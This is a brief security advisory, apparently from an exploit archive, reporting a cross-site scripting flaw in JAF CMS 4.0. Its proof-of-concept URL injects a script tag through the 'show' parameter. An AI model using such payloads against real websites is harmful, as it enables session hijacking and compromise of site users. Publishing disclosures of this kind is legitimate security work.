Home / os / win2k

jafcms-xss.txt

Posted on 03 May 2007

JAF CMS - 4.0 Cross Site Scripting Vulnerability Source: http://sourceforge.net/projects/jaf-cms/ Author: Arham Muhammad POC: http://site/path/index.php?show="><script>alert(/xss/);</script> There Is No Sign Of Filteration In Jaf-Cms, Making It Prune To Xss And Session Hijacking!

 

TOP